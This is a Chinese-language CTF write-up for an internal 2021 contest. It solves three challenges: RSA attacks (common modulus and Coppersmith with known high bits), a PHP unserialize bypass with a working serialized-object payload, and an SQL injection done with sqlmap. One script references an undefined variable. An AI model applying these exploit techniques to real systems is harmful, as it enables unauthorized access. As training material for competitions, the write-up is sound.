2021云爆杯_四校联考

内部赛

1.EZ_Rsa

先附上原题脚本

import hashlib
from Crypto.Util.number import *
text = ['xxxx','xxxx','xxxx']
msg1 = text[0].encode()
msg2 = text[1].encode()
msg3 = text[2].encode()

answer = msg1 + msg2 + msg3
flag = 'flag{' + hashlib.sha256(answer).hexdigest() + '}'
print(flag)

msg1 = bytes_to_long(msg1)
msg2 = bytes_to_long(msg2)
msg3 = bytes_to_long(msg3)

print('>>Part1')
p1 = getPrime(512)
q1 = getPrime(512)
n1 = p1 * q1
e1 = 0x101
print(p1,q1)
print(pow(msg1,e1,n1))

print('>>Part2')
p2 = getPrime(512)
q2 = getPrime(512)
n2 = p2 * q2
e2 = 0x101
e3 = 0x10001
print(n2)
print(pow(msg2, e2, n2))
print(pow(msg2, e3, n2))

print('>>Part3')
p3 = getPrime(512)
q3 = getPrime(512)
n3 = p3 * q3
print(pow(msg3, e3, n3))
print(e3, n3)
print(p3>>100)
'''
>>Part1
11693420529824711957848877878555060508607341184696923385242148106736047114727159175807160519901563374905426109609833610975906619098858392814160862926458439 13328302199989222909395433501708008501389006150636924955949357304706804677448306981604438746491395750101270025755686040619794879810309676335385613329144829
142101996556494361367379307289178830609978018209124921588154364904430024634183984713294961047243642123018624512633776884898632977444919865602488143824369406113236863132500550981251719597331808955351716961584783004411000612194142334635034612960693038822551346323987742831705749218050161464265758959578229097627
>>Part2
96644761669624481301917738904558511784349689869284077227291095697383603370416696531038428870514904299839725620796103329082259883963293954990250648331621341612726931174557257677636896537544958896292649989756895190445785876393803989356576607112504335129072639030916034557841042095819625963688752801565503231051
33779700221348135863883889808859563343423001889653007646555069516716259945612034733082561959883961917662442280291944562628883748407830474721742306313000702967971453373637827273515616724662511317244698194870689547692454885460872111009447484052870214525773772949797440252321711833250575503307765208772617173270
30751047399313667982517938591543296360089165396123556639822192850466091408760212776242161290545404062143092058831777133453019026398775795321668225155960973377187125716966663728065553458641296126185722656640906185814271035328849549938786034165849397581790764362592273425592482065323159559623654210395502163654
>>Part3
16934577053001307057854504993001752428438472030078462201433637839940457185838424666208134671016158665074466182774888595874063521317804445301020441500474225790694877804730598327025760391068106387441603824243560070381181899822479846878894800711049348702186023694716825082498367427714154072127920412210673327205
65537 80109018557353827320458455535765436463225335928012438772461958597349921842498299564523960369680047354476986568989071964740696426168299922901896285681927391448831968896549777249983312382486370651978138507159676669235052240712648692954558605647795239547687705171147624122887824463803537036584843110089828677511
8867983383521941183042966204184582810554933770125890323990596024493007165819743330176061700455869827561884657150374320733943
'''

Msg1是基础RSA解密
Msg2是共模攻击
先附上前两个的解密脚本

import binascii
import gmpy2
import sys

#求msg1,基础rsa解密

p1=11693420529824711957848877878555060508607341184696923385242148106736047114727159175807160519901563374905426109609833610975906619098858392814160862926458439
q1=13328302199989222909395433501708008501389006150636924955949357304706804677448306981604438746491395750101270025755686040619794879810309676335385613329144829
n1=p1*q1
e1=0x101
c1=142101996556494361367379307289178830609978018209124921588154364904430024634183984713294961047243642123018624512633776884898632977444919865602488143824369406113236863132500550981251719597331808955351716961584783004411000612194142334635034612960693038822551346323987742831705749218050161464265758959578229097627
phi=(p1-1)*(q1-1)
d=gmpy2.invert(e1,phi)
msg1=pow(c1,d,n1)
print (binascii.unhexlify(hex(msg1)[2:].strip("L")))

#求msg2，共模攻击脚本

sys.setrecursionlimit(1000000)
def egcd(a, b):
    if a == 0:
      return (b, 0, 1)
    else:
      g, y, x = egcd(b % a, a)
      return (g, x - (b // a) * y, y)
def modinv(a, m):
    g, x, y = egcd(a, m)
    if g != 1:
      raise Exception('modular inverse does not exist')
    else:
      return x % m
c2=33779700221348135863883889808859563343423001889653007646555069516716259945612034733082561959883961917662442280291944562628883748407830474721742306313000702967971453373637827273515616724662511317244698194870689547692454885460872111009447484052870214525773772949797440252321711833250575503307765208772617173270
n2=96644761669624481301917738904558511784349689869284077227291095697383603370416696531038428870514904299839725620796103329082259883963293954990250648331621341612726931174557257677636896537544958896292649989756895190445785876393803989356576607112504335129072639030916034557841042095819625963688752801565503231051
e2=0x101
c3=30751047399313667982517938591543296360089165396123556639822192850466091408760212776242161290545404062143092058831777133453019026398775795321668225155960973377187125716966663728065553458641296126185722656640906185814271035328849549938786034165849397581790764362592273425592482065323159559623654210395502163654
e3=0x10001
s = egcd(e2, e3)
s1 = s[1]
s2 = s[2]
if s1<0:
   s1 = - s1
   c2 = modinv(c2, n)
elif s2<0:
   s2 = - s2
   c3 = modinv(c3, n2)
msg2=(pow(c2,s1,n2)*pow(c3,s2,n2)) % n2
print (binascii.unhexlify(hex(msg2)[2:].strip("L")))

得出结果

1 2	$b'Tanabata Festival, also known as Qiqiao Festival, ' $b"Qijie Festival, daughter's day, Qiqiao Festival, Qiniang society, Tanabata Festival, "

第三个加密给出了P的高位，选择Factoring with high bits known攻击
附上脚本，在sage里运行

p = 0xd6a35446aa682606213555b20b25ec4c1c7ab3347fa20de2cc26b0fcc10e7a48057e4fcb095e1eac71b4b16a6b021a9e656fef70000000000000000000000000
n = 0x72143b40dc0dc54bc0fd389680d49bfbec8ca9e81b872a700a7652e56b94533047f178d5e3bb7ccf1f8ebddf79f2a962f631da9a3adde261cb3c7094db9594d21898e9aa7fcd7e0d7713096b26c7d777600dd4ab0f97ff45e1883f4fc85e36895a2a7900e304142948a1a66963f952d073d40f267fd0f765d5b5f79e3e693787
kbits = 100  低位个数(使用时去除该中文)
PR.<x> = PolynomialRing(Zmod(n))
f = x + p
x0 = f.small_roots(X=2^kbits, beta=0.4)[0]
print("x: %s" %hex(int(x0)))
p = p+x0
print("p: ", hex(int(p)))
assert n % p == 0
q = n/int(p)
print("q: ", hex(int(q)))

此前将p转换位2进制之后补齐0至512位，然后将p 和n 转换位16进制，不然不晓得为什么跑不出来

得出p,q的16进制：
p: 0xd6a35446aa682606213555b20b25ec4c1c7ab3347fa20de2cc26b0fcc10e7a48057e4fcb095e1eac71b4b16a6b021a9e656fef792d8e98e64668c994d586dcbf
q: 0x88100ea38af4c4ffc88b9c1571a53aa8df2dc9806fbd22fa97ac2d46e038481e0d5d7fdb8135b2c37602ab072c4cf5f34667a6f394b4bc90f0629b4906e52f39

此时p , q , e , c 都是已知，所以直接用msg1的解法基础rsa解密得出msg3

1	$msg3=cow and bull woman\'s day, Qixi, etc., is a traditional festival among Chinese people.

最终解密

import hashlib
answer='Tanabata Festival, also known as Qiqiao Festival, Qijie Festival, daughter\'s day, Qiqiao Festival, Qiniang society, Tanabata Festival, cow and bull woman\'s day, Qixi, etc., is a traditional festival among Chinese people.'
m=hashlib.sha256()
m.update(answer.encode('utf-8'))
answer1=m.hexdigest()
print(answer1)

answer1=0a81674cf3d4a570d2128284e422e56da2e38838b43161e36128cc5899440bc2

最终 flag{0a81674cf3d4a570d2128284e422e56da2e38838b43161e36128cc5899440bc2}

2.easyphp

题目源码

<?php
include('flag.php');
highlight_file(__FILE__);
class YunBao{
    public $admin;
    public $password;
 
    public function __construct($a,$p){
        $this->admin=$a;
        $this->password = $p;
    }
    public function login(){
        return $this->admin===$this->password;
    }
}
 
$YunBao = unserialize($_GET['YunBao']);
$YunBao->admin=md5(mt_rand());
 
if($YunBao->login()){
    echo $flag;

这里直接引用

<?php
class YunBao
{
    public $admin = 1;
    public $password = '$this ->admin';
}

$a=new YunBao();
$a->password=&$a->admin;
echo urlencode(serialize($a));
?>

3.云警sql王

该题是使用Sqlmap配合bp一把梭
flag在fl44444g表里面的flag列里面

不晓得为什么爆出来是frag{ybb_sqlyyds_666}
把frag改位flag成功提交